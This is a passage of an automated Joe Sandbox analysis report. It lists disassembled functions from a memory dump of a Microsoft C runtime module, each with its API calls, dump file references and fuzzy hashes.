                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FDA8E8D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,6FD91E78,0000000C), ref: 6FDA8E98
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo_lock_file_malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 1803847835-0
                                                                                                          • Opcode ID: 4abcfa46a5de5ee611e55f03d8709cf21bc9c58a21a2fa80024905b554f78a94
                                                                                                          • Instruction ID: 6f152bd843634a6333c34baea599e02f1d2080bea5cdecc65f809a80c34595f6
                                                                                                          • Opcode Fuzzy Hash: 4abcfa46a5de5ee611e55f03d8709cf21bc9c58a21a2fa80024905b554f78a94
                                                                                                          • Instruction Fuzzy Hash: F821E271A44706DAE7A08FA5C58579E7BA4AF01338F20871AD8729B1D0DB3BF641CB94
                                                                                                          Function 6FDC2EBA Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?,00000028,6FDBEF6A,00000000,?,00000000), ref: 6FDC2ECD
                                                                                                          • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6FDC2EF2
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6FDC2F4F
                                                                                                          • ??_V@YAXPAX@Z.MSVCR100(?), ref: 6FDC2F5D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 3168844106-0
                                                                                                          • Opcode ID: fbe2e23f5c76b41db5f3a55af3aa35943033447bd64c4d576bcd411ac31eac5a
                                                                                                          • Instruction ID: d108764d3691d0fba37c0f28ef2df8e663bda022cbece66383b145e2105b9fcb
                                                                                                          • Opcode Fuzzy Hash: fbe2e23f5c76b41db5f3a55af3aa35943033447bd64c4d576bcd411ac31eac5a
                                                                                                          • Instruction Fuzzy Hash: CC21A571601309DFDB88CF7AC595A6EB7F8BF4531AB10566AE451DB1A0DB30F900CB21
                                                                                                          Function 6FDC857D Relevance: 6.1, APIs: 4, Instructions: 68threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6FDC858A
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC85B7
                                                                                                          • _CxxThrowException.MSVCR100(6FDB38A8,6FE20C0C,?,?), ref: 6FDC85C5
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,?), ref: 6FDC8622
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??0invalid_operation@Concurrency@@CurrentExceptionThreadThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3517358164-0
                                                                                                          • Opcode ID: 59186ef4c02a09c62ef867c94c494fb7285397f9138240b105c31ea8829d9eaf
                                                                                                          • Instruction ID: 25bdc9f6631b6cde1a407041fa7df4e8df9834d60295bac17c50f5f2834ee608
                                                                                                          • Opcode Fuzzy Hash: 59186ef4c02a09c62ef867c94c494fb7285397f9138240b105c31ea8829d9eaf
                                                                                                          • Instruction Fuzzy Hash: 1A21C0B5508385DFCB92DFA8C8D4DAEBBB8AF41304B04482ED1529B241D7B0F549CB62
                                                                                                          Function 6FDDC792 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 2819658684-0
                                                                                                          • Opcode ID: 9cb5d0bc03f75acf702224edc93ec18035c9734200fcff1bb3d4aa36f852af64
                                                                                                          • Instruction ID: 98ff323ce07807b37c1515636df28621ddba7fbc9c15becf3e329f7232e2597e
                                                                                                          • Opcode Fuzzy Hash: 9cb5d0bc03f75acf702224edc93ec18035c9734200fcff1bb3d4aa36f852af64
                                                                                                          • Instruction Fuzzy Hash: 38119D36A00716EBCBA19F78C804A9B77B1EF40B64F111A1AFC648B290D330F950C7E6
                                                                                                          Function 6FDC0B00 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B1E
                                                                                                          • QueryDepthSList.KERNEL32(00000148,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B32
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B54
                                                                                                          • InterlockedPushEntrySList.KERNEL32(00000148,-00000004,?,?,?,?,6FDC0A34,00000001,?,6FDC0A54), ref: 6FDC0B6C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 94243546-0
                                                                                                          • Opcode ID: d6c53e575395ab4cef175934d5d03abdccd88d09edebe051de7f1eb20938099b
                                                                                                          • Instruction ID: 49681c8ae24ae4aecc5682058cc93335ba31db28e0b6b175992f19afbb23f8d6
                                                                                                          • Opcode Fuzzy Hash: d6c53e575395ab4cef175934d5d03abdccd88d09edebe051de7f1eb20938099b
                                                                                                          • Instruction Fuzzy Hash: 7F21D1B2900710DBEB50CF20C889B9E77F8AF42769F040569E84BCB190CB74FA04CB61
                                                                                                          Function 6FD8CCBF Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _lock_file.MSVCR100(?,6FD8CD60,00000014), ref: 6FD8CD0C
                                                                                                            • Part of subcall function 6FD8A48D: _lock.MSVCR100(?,?,?,6FDD6E10,00000040,6FDD6E48,0000000C,6FDA8676,00000000,?), ref: 6FD8A4BA
                                                                                                          • _fgetwc_nolock.MSVCR100(?,?,?,6FD8CD60,00000014), ref: 6FD8CD21
                                                                                                          • _errno.MSVCR100(6FD8CD60,00000014), ref: 6FD92A90
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(6FD8CD60,00000014), ref: 6FDA86B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                                                                                          • String ID:
                                                                                                          • API String ID: 3916178533-0
                                                                                                          • Opcode ID: 6e95bd6286dc2649f92d34cc4a40dfd4499a9fc17877da95c5715610eb44bbbb
                                                                                                          • Instruction ID: 0892f09178075dd6a3db108a7e9424b3db9dc7a19da6d0ebd4e163edeb7916b9
                                                                                                          • Opcode Fuzzy Hash: 6e95bd6286dc2649f92d34cc4a40dfd4499a9fc17877da95c5715610eb44bbbb
                                                                                                          • Instruction Fuzzy Hash: D111C875A01346DFCBE06FB9C4804AD77B0AF04319B11863FD5769B180D338B5818B94
                                                                                                          Function 6FD8C46C Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _initterm_e.MSVCR100(6FD8C498,?,?,6FD8B911,00000000), ref: 6FD8C440
                                                                                                          • atexit.MSVCR100(6FDA70E0,?,6FD8B911,00000000), ref: 6FD8C450
                                                                                                          • _initterm.MSVCR100(6FD8C46C,6FDA70E0,?,6FD8B911,00000000), ref: 6FD8C461
                                                                                                          • _calloc_crt.MSVCR100(00000004), ref: 6FD8C4BC
                                                                                                          • _calloc_crt.MSVCR100(00000014,00000004), ref: 6FDA8875
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _calloc_crt$_initterm_initterm_eatexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1478392991-0
                                                                                                          • Opcode ID: 42f584771e0b84d329de1b5a99d0e46ed9f1e5ad500cc63e18e75a57fecab2c4
                                                                                                          • Instruction ID: 4d5a4354128eed1a0e9e8ef249bc26081c087e4a73157d658010c54059411e25
                                                                                                          • Opcode Fuzzy Hash: 42f584771e0b84d329de1b5a99d0e46ed9f1e5ad500cc63e18e75a57fecab2c4
                                                                                                          • Instruction Fuzzy Hash: 9411237500D7818FF38B2B38AD229697F72AF43628715419FC4A0CB292EB217184872A
                                                                                                          Function 6FDD42CE Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _ftelli64_nolock.MSVCR100(?), ref: 6FDD42FC
                                                                                                          • _fileno.MSVCR100(?,?,?,?), ref: 6FDD433E
                                                                                                          • _lseeki64.MSVCR100(00000000,?,?,?), ref: 6FDD4345
                                                                                                          • _errno.MSVCR100 ref: 6FDD4358
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_fileno_ftelli64_nolock_lseeki64
                                                                                                          • String ID:
                                                                                                          • API String ID: 1192294219-0
                                                                                                          • Opcode ID: 140ddfbba7aa71d6ccca8f112891bc2ee516aeeec33b6ff1cab8229a1725755d
                                                                                                          • Instruction ID: e9faa46762bfda65bf9cb21e7682f89bf520c1ebac7f7181f36b0a41cd3c13b1
                                                                                                          • Opcode Fuzzy Hash: 140ddfbba7aa71d6ccca8f112891bc2ee516aeeec33b6ff1cab8229a1725755d
                                                                                                          • Instruction Fuzzy Hash: B111A032980744EFDBA1AF2DD844A9E3766BF83374B19860AF878971E0C735F0128760
                                                                                                          Function 6FDB8F4E Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDB8F6F
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C2C), ref: 6FDB8F84
                                                                                                          • ??0invalid_operation@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDB8FA2
                                                                                                          • SetEvent.KERNEL32(?), ref: 6FDB8FED
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@??0invalid_operation@Concurrency@@Copy_str@exception@std@@EventExceptionThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3020611386-0
                                                                                                          • Opcode ID: 0febf3ae29b5b64bb5c01456b0786c7fe90e203ccac01f990ccc7d398a6fd4dc
                                                                                                          • Instruction ID: f32c02a5c2d8240f0b4e9b798464e9c077165eec8d28b083ef63c07dad24f31e
                                                                                                          • Opcode Fuzzy Hash: 0febf3ae29b5b64bb5c01456b0786c7fe90e203ccac01f990ccc7d398a6fd4dc
                                                                                                          • Instruction Fuzzy Hash: A2117CB5900204EFCB44DF68C88198E7BB9EF49365B11816AED169F251DB30FA42CBE1
                                                                                                          Function 6FDC21D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC2203
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20DC8), ref: 6FDC2218
                                                                                                          • ??0invalid_scheduler_policy_thread_specification@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC223E
                                                                                                          • ??0invalid_scheduler_policy_value@Concurrency@@QAE@XZ.MSVCR100 ref: 6FDC2257
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency@@$??0exception@std@@??0invalid_scheduler_policy_thread_specification@??0invalid_scheduler_policy_value@ExceptionThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1930344252-0
                                                                                                          • Opcode ID: bb6013322dc02c6ed487899e91fca09855e397f700838335b7710e8bbfffa834
                                                                                                          • Instruction ID: adcbebd14ef445cbbda96b3b130b68124ce34073f9bca075ab6373085e7e04a4
                                                                                                          • Opcode Fuzzy Hash: bb6013322dc02c6ed487899e91fca09855e397f700838335b7710e8bbfffa834
                                                                                                          • Instruction Fuzzy Hash: 9611E735505304EB8F94DFA8D4D0C8DF7AD5F46329310922BE921A7280DF70B5018B63
                                                                                                          Function 6FDDE14F Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDE162
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE16D
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDE17E
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE189
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 454e560af62c4db9ba346a9d25c76cbbc67f204659804b2d2410b7a69beaabee
                                                                                                          • Instruction ID: f532980694d0fa42e5814287bbe6cf7ae9ef171f5c24f35d3ea94d0157cf9c86
                                                                                                          • Opcode Fuzzy Hash: 454e560af62c4db9ba346a9d25c76cbbc67f204659804b2d2410b7a69beaabee
                                                                                                          • Instruction Fuzzy Hash: 8511C473B04359DBD7A1AF7888406ACFBA9AF42328B2542A6F4B05B0D1D731B942C791
                                                                                                          Function 6FDDE2D7 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDDE2EA
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE2F5
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDDE306
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDDE311
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID:
                                                                                                          • API String ID: 1328987296-0
                                                                                                          • Opcode ID: 2eeb12b51ceca818f44851208dcf9cf801f23a1e37b7a351f05e40353a17b84c
                                                                                                          • Instruction ID: 93cde3827e5551187a53d0203f2ffc9fe14a2b271000dac18011d1dbbe684248
                                                                                                          • Opcode Fuzzy Hash: 2eeb12b51ceca818f44851208dcf9cf801f23a1e37b7a351f05e40353a17b84c
                                                                                                          • Instruction Fuzzy Hash: 3B11B271804799DBCB81BF78C4409BDFBA0AF0132AB254296E4F05B0A2D732B942C7A0
                                                                                                          Function 6FDC2133 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC2173
                                                                                                            • Part of subcall function 6FDF35FA: ?_Copy_str@exception@std@@AAEXPBD@Z.MSVCR100(6FDC2115,?,?,6FDC2115,6FDC1F83,?,6FDC1F83,00000001), ref: 6FDF3615
                                                                                                          • _CxxThrowException.MSVCR100(6FDB3A50,6FE20DAC,?), ref: 6FDC2188
                                                                                                          • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(?,6FDB3A50,6FE20DAC,?), ref: 6FDC2190
                                                                                                          • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6FDC21BD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??0exception@std@@Policy$Concurrency@@Copy_str@exception@std@@ElementExceptionKey@2@@Policy@SchedulerThrowValue@
                                                                                                          • String ID:
                                                                                                          • API String ID: 1121527890-0
                                                                                                          • Opcode ID: fac22d59718ca59322b0a2b5715f6207a3cbb61604c8f0f1b08d7c3a85e9bcd8
                                                                                                          • Instruction ID: 9f958cd4118deb92a65ca42dd3e85555b09d7444eb51ae26d525d7dc5c941f84
                                                                                                          • Opcode Fuzzy Hash: fac22d59718ca59322b0a2b5715f6207a3cbb61604c8f0f1b08d7c3a85e9bcd8
                                                                                                          • Instruction Fuzzy Hash: 1D11C876A00308FB8B81DFA8C4C19DDBBBD9F91759711911BE905AB240DB30F641CBA2
                                                                                                          Function 6FDF6972 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDF698D
                                                                                                          • _aligned_msize.MSVCR100(?,?,?), ref: 6FDF69B2
                                                                                                          • _aligned_offset_realloc.MSVCR100(?,?,?,?), ref: 6FDF69C6
                                                                                                          • memset.MSVCR100(00000000,00000000,?), ref: 6FDF69E1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _aligned_msize_aligned_offset_realloc_errnomemset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3881611735-0
                                                                                                          • Opcode ID: 79abd0fea76a63dc51bbfb3f299f826c6d3e243bca123da6ad3981a0b3c9e7f5
                                                                                                          • Instruction ID: 74fff0d120d9544f050a9748e8058ac8df75c4fed64b6ff623b9d32fab14ae92
                                                                                                          • Opcode Fuzzy Hash: 79abd0fea76a63dc51bbfb3f299f826c6d3e243bca123da6ad3981a0b3c9e7f5
                                                                                                          • Instruction Fuzzy Hash: 1601F132601219EBCB515FA4DC91D9F3B79EF82254F02053AFA1886550E632F92687A0
                                                                                                          Function 6FD91F1C Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _fileno.MSVCR100(?,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F61
                                                                                                          • _lseek.MSVCR100(00000000,?,00000001,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FD91F68
                                                                                                          • _errno.MSVCR100(?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FDA8D1F
                                                                                                          • _ftell_nolock.MSVCR100(?,?,?,6FD91EDE,?,?,?,6FD91F00,0000000C), ref: 6FDA8D33
                                                                                                            • Part of subcall function 6FD8A595: _fileno.MSVCR100(?,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5C4
                                                                                                            • Part of subcall function 6FD8A595: _write.MSVCR100(00000000,?,?,?,?,?,?,6FD8A830,?), ref: 6FD8A5CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
